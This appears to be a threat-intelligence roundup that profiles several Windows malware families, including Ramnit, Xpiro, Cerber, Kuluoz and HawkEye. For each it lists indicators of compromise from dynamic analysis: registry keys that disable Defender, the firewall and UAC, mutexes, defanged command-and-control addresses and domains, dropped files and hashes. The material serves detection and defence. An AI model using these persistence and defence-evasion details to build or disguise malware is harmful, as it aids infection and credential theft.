For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Virus.Ramnit-9964077-0 Virus Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also steals browser cookies and attempts to hide from popular antivirus software.
Win.Virus.Xpiro-9964080-1 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Cerber-9964300-0 Dropper Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Worm.Kuluoz-9964104-0 Worm Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Dropper.HawkEye-9964231-0 Dropper HawkEye is an information-stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can propagate through removable media.
Win.Dropper.Formbook-9964246-0 Dropper Formbook is an information stealer that attempts to collect sensitive information from an infected machine by logging keystrokes, stealing saved web browser credentials, and monitoring information copied to the clipboard.
Win.Dropper.Remcos-9964868-1 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.XtremeRAT-9964479-0 Dropper XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
Win.Packed.Shiz-9964480-0 Packed Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.

Threat Breakdown

Win.Virus.Ramnit-9964077-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
18
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND 1
Mutexes Occurrences
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 18
{79345B6A-421F-2958-EA08-07396ADB9E27} 17
{7930D12D-1D38-EB63-89CF-4C8161B79ED4} 16
{7930CC18-1D38-EB63-89CF-4C8161B79ED4} 16
{7930DB19-1D38-EB63-89CF-4C8161B79ED4} 16
{<random GUID>} 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
46[.]165[.]254[.]201 18
72[.]26[.]218[.]70 18
195[.]201[.]179[.]207 18
208[.]100[.]26[.]245 18
206[.]191[.]152[.]58 18
142[.]250[.]72[.]110 18
64[.]225[.]91[.]73 18
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
google[.]com 18
testetst[.]ru 18
iihsmkek[.]com 18
mtsoexdphaqliva[.]com 18
uulwwmawqjujuuprpp[.]com 18
twuybywnrlqcf[.]com 18
wcqqjiixqutt[.]com 18
ubgjsqkad[.]com 18
tlmmcvqvearpxq[.]com 18
flkheyxtcedehipox[.]com 18
edirhtuawurxlobk[.]com 18
tfjcwlxcjoviuvtr[.]com 18
Files and or directories created Occurrences
%LOCALAPPDATA%\bolpidti 18
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 18
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 18
%TEMP%\squhapjc.exe 16
%TEMP%\aacwxnxw.exe 16
%ProgramData%\qvqdlyny.log 16
%LOCALAPPDATA%\yjghhxdl.log 16
%LOCALAPPDATA%\aanqrsjf.log 14
\TEMP\tFXd2E8YU 1
%LOCALAPPDATA%\bolpidti\pxBC6E.tmp 1
\TEMP\5ETGN6snq 1
\TEMP\zYyccBVe 1
%LOCALAPPDATA%\bolpidti\pxBE23.tmp 1
%LOCALAPPDATA%\bolpidti\pxACA6.tmp 1
%LOCALAPPDATA%\bolpidti\pxB5DA.tmp 1
\TEMP\cjTnE8Jr 1
\TEMP\o2gKdKfQ 1
\TEMP\o192e68 1
\TEMP\QYnhH23 1
\TEMP\lgxG4A4 1
\TEMP\YWj2Vj1 1
\TEMP\5nPK0vwsR 1
%LOCALAPPDATA%\bolpidti\pxBDC6.tmp 1
%LOCALAPPDATA%\bolpidti\pxB676.tmp 1
%LOCALAPPDATA%\bolpidti\pxB53E.tmp 1
*See JSON for more IOCs

File Hashes

16b156359492fd1c04ca8024be9520ed9b2f2c1c3a9d2d72177b74e53c5f7237 1837b9072548d7fd6ccff6dff1c9f6261df6ab977c06aef95b328bcbcde8f24d 1a74c2f06d531a5947ea3fa980fb9e08dd4ef2938cd53215b1fb04403160632d 1b85483edb2968b8303b3a3edeb69776cc237bfb2e844862315aad399a1fbb60 3cf846acf89647d5eec22871e3b8d36fb2e6a1e24b609cc140fb4d32b3627a89 3ea014d13ab9de10c12705d951d36001fade2375373992d09f04a13991abdda6 650b142204d54fb6be3adc953325be09df8e8472f6e75bf89bd96fac0604df07 705e36bc25534e3496cf040179df7965df62f4f8d20d2296af65ed2c7765ad08 7d34aa04431ca6d29ae750551d62303521f50e7302e508b8c3a68c2501cedbc7 7dcf9ef1156ebc96cd7f33fa65da1aa3ee6c4e40d98f396ef4f997384324debd 9ad3fe646a2e70461cbd0c6b5baf6e6aa86780bfec67324dc37cc71abc16dc6d 9f42d128eadd1933ef6f05b58612799009a028830d9e62a384565616fca5d6a3 c963abb11b88bd5d2b451b6a73e2e853ce7777ff07a5a481d1c6d195f5d6bf34 d9799be6fc5a08a58f2da15d8ce3550fb462ccb97b6e932d1531ffdbc4af28c7 d9cbec3c2d30347d5781f4f656e0775eda33ae905092bc1673a8d68aeb9f643a ecc77e015461dc1d4f9760ae11faa17ed9a46916a15c958cd2fd888b9d18441a f1e64265f0a305cba4442afeb8014c726b93c5065b92cbe997ebe02ff38f4092 fd2ee83c36b70791828d0143ad3737d917edaaf909f72499f6709615391e3700

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Virus.Xpiro-9964080-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\SYSEVENTPARAMETERS
Value Name: RightMaskEnable
25
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\SYSEVENTPARAMETERS
Value Name: ShakeEnable
25
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\PERSIST\0\1
Value Name: HidCursorName
25
<HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\PERSIST\0
Value Name: type
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TABLET PC
Value Name: Ident
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC\CACHE
Value Name: HPITP
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC\CACHE
Value Name: HPETP
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC
Value Name: IsTabletPC
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\TABLET PC
Value Name: IsTabletPC
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC
Value Name: DeviceKind
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE
Value Name: Start
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: Type
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: Action
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: Guid
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: Data0
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: DataType0
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: Data1
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: DataType1
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: Data2
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: DataType2
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: Data3
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TABLETINPUTSERVICE\TRIGGERINFO\0
Value Name: DataType3
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
25
Mutexes Occurrences
kkq-vx_mtx63 25
kkq-vx_mtx64 25
kkq-vx_mtx65 25
kkq-vx_mtx66 25
kkq-vx_mtx67 25
kkq-vx_mtx68 25
kkq-vx_mtx69 25
kkq-vx_mtx70 25
kkq-vx_mtx71 25
kkq-vx_mtx72 25
kkq-vx_mtx73 25
kkq-vx_mtx74 25
kkq-vx_mtx75 25
kkq-vx_mtx76 25
kkq-vx_mtx77 25
kkq-vx_mtx78 25
kkq-vx_mtx79 25
kkq-vx_mtx80 25
kkq-vx_mtx81 25
kkq-vx_mtx82 25
kkq-vx_mtx83 25
kkq-vx_mtx84 25
kkq-vx_mtx85 25
kkq-vx_mtx86 25
kkq-vx_mtx87 25
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 25
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 25
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 25
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 25
%System32%\alg.exe 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.lock 25
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.lock 25
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngenservicelock.dat 25
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\ngenofflinequeuelock.dat 25
%SystemRoot%\Microsoft.NET\ngenservice_pri1_lock.dat 25
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\ngenofflinequeuelock.dat 25
%LOCALAPPDATA%\Microsoft\Journal 25
%LOCALAPPDATA%\Microsoft\Journal\Cache 25
*See JSON for more IOCs

File Hashes

0070146a1ddd5e7afa882029c836662a3fb7b83f2c838d1d89caf36ceaa73a47 00b9049e01ce60ee17e973f88fc730db18f2354b24a991cac09045cf697ffcf2 016023a53be6ce6624efe73b85c47c87d1e11ba8593009e261361addc6b5229e 048729edafbebec1b073db5db75450793fdd7e424dff0f851ad7500637b18bb3 087ef762c54b247a6fe8c1780073c934a4109a19dea80daefeec3bc98ca184ba 0b903e0f08dd1d929b6465e79971af4270fd7adb95e3271f442e4f6c2b6c01cf 0e40ef742a696da27514cf05055133991293a0e7d451ccc6d96ec93c0e864518 0e5e93e845310617138227cb8a453da259c23edcc9a8059fac49da8e947887a5 158627899237148353fefd8771d26c622b873d6177960e2efe00355179fb4926 1a4a30778ce717e13e02870993244eea6614a74a47bd0c5b01a8d839c670ef3c 1b56d9fe2ff011d5fad562c8e8da9dcb15a8f417619e5f506772acb6d53b3814 1b6494daf80b3f3afa22ffb43976d529383b9c3e0e2a337fa03234c784ce68a6 1e955e41ac1707547188639c3e0d8dcf46c0a05880041076eafb967a5cb2e6ca 1f48b7aaccb5c9c37c9a5322aecde23cec77a378e20db829c3ea8888c153bdc2 1f89fcbb17f91bee3821e3ae7ad9b8c2f2427ecb7e11b2af366713111c5f4a9f 21a7485afe868ce040664494eb3adbefd2f88eaed2fbf168feac2ec1eb2fa213 28e949123a4493bc7276085d3387c5f8aa761087087b9488782543b41c47cf7f 2bb191ac9f42eeb32f06ed94083221c5abb6b894f0bffe17355e125773a85f7f 2d5faf0c2fce5f825fa278dea2aef683d928326d30e976aa8d85bd3d1a3bf947 30408f887ac16f3a1b11b1ba075c5c6aa6a8fd34dc3059ecb611dcd80245b70a 341507c416c481481ced2ca2b4739e58a23882bcf8d3a48b193e4983743db45f 347b1f4517869f1574065c2867ed410a6a8c5bac063b8551133769890f16305e 3bbbe0a4c6cf2f6a1a57c7b31adc6abff0bd39e9b4ead44ec93558f03e5aa9dc 3bcdda17309cd36926504ad0300da1226ba126413c25aaabed729d889e293deb 3c35ed8b6f46dec8e7386f380ea3f0530fb592e50f0a66486a5c1d1390441f2c
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Cerber-9964300-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
31[.]184[.]234[.]0/23 25
Files and or directories created Occurrences
%APPDATA%\Microsoft\Access\AccessCache.accdb 1
%APPDATA%\Microsoft\Access\# HELP DECRYPT #.html 1
%APPDATA%\Microsoft\Access\# HELP DECRYPT #.txt 1
%APPDATA%\Microsoft\Access\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\Outlook Files\# HELP DECRYPT #.html 1
%HOMEPATH%\Documents\Outlook Files\# HELP DECRYPT #.txt 1
%HOMEPATH%\Documents\Outlook Files\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\OneNote Notebooks\Notes\# HELP DECRYPT #.html 1
%HOMEPATH%\Documents\OneNote Notebooks\Notes\# HELP DECRYPT #.txt 1
%HOMEPATH%\Documents\OneNote Notebooks\Notes\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\# HELP DECRYPT #.html 1
%HOMEPATH%\Documents\# HELP DECRYPT #.txt 1
%HOMEPATH%\Documents\# HELP DECRYPT #.url 1
%HOMEPATH%\Documents\OneNote Notebooks\Personal\# HELP DECRYPT #.html 1

File Hashes

1d742c8577645242811867311339af6291f2ec45f74bc8065a1cf167a140a5fd 241a8a73608aae3d0b55451290c7e3d46ff6b53d7cfad628ddc43892fb4ee89f 32cafa5a0a63f137fda8532c81a4825895a71b4bd5192ef77ee46b4f5f6f55c9 3f066735d5b3e9e1d145865b805dad9f17c7569e86a2fd0dadfd82fa3f2494b5 46df3cbdc0c960cc03467797f2a8f4000de6f3860ddd87a93f0db4bc04bf3dc9 5145e134c5c488fac15c3772747505246139842d64e995a20aa343e87d05805a 529c0ad1eba89641544fe5eb534b717fdb0a21e36db94874cdc7720b3e58170d 65fb6bf40643b54875192d5964ead478b867784c09708c9be583a06d820462e8 6a380578e8f27a835c45af896c8292c173ccf10819eadb160d8fd1ec9301ae61 6bd30bfa9ee3dcf045298887cb839ccf7ebd19950a4a1798bb15c9c2bcd89df6 715e19ce015fb13ad5b0bd5aa520b7a9fdb52c15a58b78da79db3c74cdccee83 74a423f877c5f0819116f6f93870658bac4ac7de6048e68d5f1cb98df9c77992 7781696924168577eb1045874ac6a259617184cd2bdf429fd032efd63254016d 7eecc13411c597f5e2fa68c77ae65943ae99c0eb6bb76e527a9711ffff73d505 832487a8c89c32e86036b1c94353117ab0ca7a4276a9f4c08b29c96c447247fa 89ec20a6130f663160015755f0c1b4f1698812e3f0e39d3e7094950c3644bca4 8ab03a0c900cc88a57e9474d3ced6b4f43be422750f5afc8a08ff6cdb801930b 936d99a0dc23922d4e5874f1548114fe8f2170016f29d9b91858796a1b2ab095 96671b8ca3f8cf75427a23de8ddde2513efd4f1eba5afa2b18610c66548d0b55 988a44db0411379ea08fece4af0577d3af7ed5114dcbd897a03ec46474fafa81 a162009fa564f3c20b801568ab82dd34b53655473c6e379272e3dfd766fe2c02 a3004d7f08a9357c5d0a9e063dafd5f4c627fce7b030a575b6959f0f5f7c9ff1 b2f4ef1398ae23fabaa137be5f8f7f5412b1b8f74f902d23de5e0a87ef5a3867 bcc77c2e25a5ceee5fd7023dd879baa53a16ce0f4b3187a90a5eb22cf46631af df5d03a2ca58bb71c44a8b23191c7d3e24327e806509dfcccad1cd63729dc445
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Worm.Kuluoz-9964104-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\TKQJXHIR
Value Name: nnagtvkf
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iemwudbv
2
<HKCU>\SOFTWARE\PKBQSDOK
Value Name: wfiqbttr
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: deiobboq
2
<HKCU>\SOFTWARE\TEFAPJXX
Value Name: hjlkqasv
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nmvftwdp
2
<HKCU>\SOFTWARE\ROHCSWFU
Value Name: ivxesusr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rskaarvw
1
<HKCU>\SOFTWARE\ONFHUPBQ
Value Name: qrlpghvv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: dwxwetxw
1
<HKCU>\SOFTWARE\JUNLDJNI
Value Name: paxvvuef
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: buwqaweo
1
<HKCU>\SOFTWARE\QPANUOIR
Value Name: mmvjkbpj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lawgdaar
1
<HKCU>\SOFTWARE\IDIFICQU
Value Name: uqiuudaf
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uaugufwr
1
<HKCU>\SOFTWARE\EPCSQSNO
Value Name: sdkgxoqv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nojriosh
1
<HKCU>\SOFTWARE\IIBPNATQ
Value Name: qbmgekoa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tabswxsd
1
<HKCU>\SOFTWARE\CHUFRWHS
Value Name: nhmwllub
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: kawalexr
1
<HKCU>\SOFTWARE\QDCTDCFM
Value Name: ietjtgir
1
<HKCU>\SOFTWARE\JUOBFMWV
Value Name: ucngtfoi
1
Mutexes Occurrences
2GVWNQJz1 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
91[.]196[.]126[.]16 21
88[.]198[.]25[.]17 20
173[.]203[.]113[.]44 19
178[.]33[.]162[.]8 18
176[.]31[.]106[.]226 18
74[.]50[.]60[.]116 18
198[.]24[.]142[.]66 17
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

0828aee088e7c191c463dac5a2449474da1b106da5e12b6335f61d2dd3ae320e 0ddf461f926f814d19696d3851f3673c10d69a15fa2d7cfac9552c3af9460c66 12b274776143da76ceea8cfc1b8219535bca09dea1ea6059a48e74dd6a78e80d 160999be2e3f124a106ced958bce6b6f94fbc3645895aa0129e4dedb443011d7 21245351ac8d14c31552d46c0f8ceec6d576a1abae0ab3d5131e25e9e8fefe32 23fec3f833e9a7ee790ea9cad1b205ade2036466282654b2e53f23516553b775 24e1fb11b1c63caf42bc0a9d8df57cb1c84ccb11415f01c56de128d6ceb2ea4e 2bf5a6f99c57bcaddd28a0a8dad595686b9a660843cd4037575d4abb82af8f69 32a01832f4de0f17e438fed6be9f155d9fd30056133681c7474f0114a1731a9b 35a4fe74474b4f7e7f9c777d063097e36a16f509bc3afb9579779c0504b73af4 3a3fae86a4e14a7d50b6c5bc5d78dc12745fa53d240df641e1fc311449368c85 3da619fa973717201422faf7329016a266b27b89f8a39416cac203f75f32259a 405d7737a27f0798b16f85939c3eacfcbe9e5305b4c621dd20bcaffbe994d88f 413f4fcae50cdad66f08e0e3ae083e60e18e54f890492fcd0241deb9dfe81b81 44d0507ee9143aa548ae8a03171b27633f4226abbad172a0456194a2ef2eb507 44d1449c19d3f79a3fe21e2ab9d333a1bea4156565a3106fc2203ccefa869a9b 4979dce8592c0d16bdc6228b9741ef6c315e3bb1ff34de14271fb3499cd0f139 4b7891ed58a08b45b576282afd74fe835845cd4be8c5aab467ad09136e87ec8e 4bc8eb3d2e72a44384b3d824b33a971ace9eae20998dfe8bdd2ab9b9267b5b43 4c6528d000e07485c69f1c32a95967a454fd20864a4ad2c062160d99987822ef 50c108f9fc31557d55216dfe28b9eeac15fe5f1175a089ff196e1129d6ddf593 5730f9ce8c84e6f1c153c247146ac1590fd989a73cdc9dce9d67594b33caf354 5a45837812962153f5d480918eab77093394dd41c45c610ffd142461ab433668 5e37715cc8a5d1b6c5bed437eea25da495285bb1386cf2aef2b5484fd6c30e69 5ee4adead518246dc926545a0d28e1a488f04d530c49591cc788a8e2b360ad89
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.HawkEye-9964231-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Audiodgi
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
1
<HKCU>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: DisableCMD
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 1
<HKCU>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wsntcffy
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nvidia
1
Mutexes Occurrences
<random, matching [a-zA-Z0-9]{5,9}> 25
Global\2ef47fa0-2008-11ed-9660-001517841a07 1
Global\30820541-2008-11ed-9660-001517841a07 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]62[.]9[.]171 8
185[.]53[.]177[.]51 8
172[.]253[.]62[.]108/31 5
178[.]217[.]187[.]144/31 3
217[.]69[.]139[.]160 2
123[.]126[.]97[.]113 2
103[.]224[.]182[.]246 1
178[.]217[.]186[.]170 1
178[.]217[.]187[.]103 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
myip[.]ru 8
resolveme[.]org 8
www[.]myip[.]ru 8
smtp[.]gmail[.]com 5
smtp[.]mail[.]ru 2
smtp[.]163[.]com 2
bobbyjoeconfirmed[.]biz 2
pradaengaged[.]serveftp[.]com 1
xtradaniels[.]no-ip[.]biz 1
funtalk[.]info 1
moneymakingmachines[.]in 1
Files and or directories created Occurrences
%APPDATA%\_backups 25
%TEMP%\logff.txt 16
%TEMP%\logmail.txt 16
%APPDATA%\AudioSettings 12
%APPDATA%\AudioSettings\Audiodgi.exe 9
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Audiodgi.exe 8
%APPDATA%\Audiodgi.exe 2
%TEMP%\mRef.vbs 1
%APPDATA%\21bc764836db3d1ea78f465895072d4b.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\wsntcffy.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\nvidia.exe 1

File Hashes

